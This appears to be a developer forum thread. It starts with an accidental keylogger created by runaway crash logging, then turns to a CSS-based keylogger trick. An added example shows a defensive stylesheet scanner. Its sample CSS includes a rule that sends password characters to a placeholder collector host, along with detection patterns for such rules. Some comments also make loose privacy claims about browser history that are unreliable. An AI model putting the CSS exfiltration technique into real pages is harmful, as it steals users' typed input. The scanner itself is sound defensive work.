44
lorentz
3y

So apparently due to an extremely talkative x input driver and an error in a certain app, I've been running an emergent keylogger on my computer for half a year. On every keypress event, the driver would call the app, the app would segfault, the driver would log the incident including the event to /var/log and then crash, and the app would restart the worker. I noticed this when I started wondering why /var/log is over 100GB in size.

Comments
  • 8
    We had an internal website that would log every access to the site. We also had a widget on the site that would get weather info using ajax once per second. I was wondering why the website was having issues. I found this stupid log file and it was 6GB or so on a small drive. It was interfering with the computer working correctly. I don't know how long it took to build up to that size, but someone else maintains it now...
  • 10
    Reminds me of a CSS keylogger:

    You set a hidden element’s background image to a url including the text of an input box (using attr()) so the url contains the user input. The server then gets a new request for every change in the text box. Optionally add an advertising ID for uniqueness, and you’re done. Remote keylogger!

    Being a GET, it’s obv snoopable, but if you’re doing this you don’t care about user privacy anyway.
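Added example, not part of the thread or any commenter's code: a defender-side stylesheet audit that flags rules able to turn input text into image requests. It covers the `attr()`-inside-`url()` form described in the comment above and, as a generalization beyond it, rules whose selector matches on an input's `value` attribute while loading a URL. The sample CSS, the host `collector.example` and the function name `scanCss` are constructed for illustration.

```javascript
// Constructed sample stylesheet; hostnames and selectors are placeholders.
const SAMPLE_CSS = `
.logo { background-image: url("/static/logo.png"); }
input[type="password"][value$="a"] { background-image: url("https://collector.example/k?c=a"); }
#probe::after { content: ""; background: url(attr(data-typed)); }
input[type="text"] { border: 1px solid #ccc; }
a[href^="http"] { background: url(/static/ext.svg); }
`;

// Selector that keys on the value attribute of a form control.
const VALUE_SELECTOR = /\[\s*value\s*[\^$*~|]?=/i;
// url(...) whose argument is built from attr(...).
const URL_FROM_ATTR = /url\(\s*[^)]*attr\(/i;
// Any url(...) with an optionally quoted argument.
const URL_ANY = /url\(\s*(['"]?)([^'")]+)\1\s*\)/i;

// True for absolute or protocol-relative URLs (request leaves the page's origin path space).
function isRemote(u) {
  return /^(https?:)?\/\//i.test(u.trim());
}

// Returns one finding per suspicious rule: { selector, reason }.
function scanCss(css) {
  const findings = [];
  const stripped = css.replace(/\/\*[\s\S]*?\*\//g, ""); // drop CSS comments
  const rule = /([^{}]+)\{([^{}]*)\}/g; // flat rules only; nested at-rules are not unwrapped
  let m;
  while ((m = rule.exec(stripped)) !== null) {
    const selector = m[1].trim();
    const body = m[2];
    if (URL_FROM_ATTR.test(body)) {
      findings.push({ selector, reason: "url-from-attr" });
      continue;
    }
    const url = URL_ANY.exec(body);
    if (url && VALUE_SELECTOR.test(selector)) {
      const reason = isRemote(url[2]) ? "value-selector-remote-url" : "value-selector-url";
      findings.push({ selector, reason });
    }
  }
  return findings;
}
```

A Content-Security-Policy that restricts `img-src` and `style-src` to trusted origins limits where such requests can go even if a rule like this reaches the page.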
  • 3
    @Root I'll add this to my collection of evil tricks composed to break and abuse websites in hard-to-detect ways when opportunity comes.
    It can also be attached to a hidden pseudo element for added confusion.
  • 1
    Cheers I'll drink to that
  • 0
    @Root as long as the request is over https it doesn't matter if it's a GET request.
  • 2
    @ZeldaFan69-2 Cloudflare, browser history.

    Honestly, I don’t like the idea of relying solely on transport level security. Single point of failure, can’t trust users to not install spyware certificates, other entities trying to spy, etc.

    Also, Cloudflare is specifically designed to circumvent TLS via certificates, meaning they can and do intercept all HTTPS requests and responses in cleartext. Anything sent/received between a user and a “Cloudflare-protected” website should therefore be treated as leaked / non-private.

    Plus, GET requests are stored in browser history, which JavaScript can get access to, meaning it should be treated as public information. Though requests made via CSS and other browser internals aren’t, so you’re right here. The above points stand, though.
  • 1
    @AtuM Oh my. You are making some scary sense.
  • 0
    @Root about needing sleep? 🤔
  • 0
    @jkommeren What?
    I mean, I do need sleep, but. What?
  • 0
    @Root err you mentioned he made sense. He said he needed sleep? 😁

    Sorry, late for me too 😅
  • 0
    @jkommeren Aha! Missed that.
    Missed the entire second half of his post, apparently.
  • 0
    @Root Curious, I also missed the second half until a few days ago.
  • 0
    @homo-lorens 🤷🏻‍♀️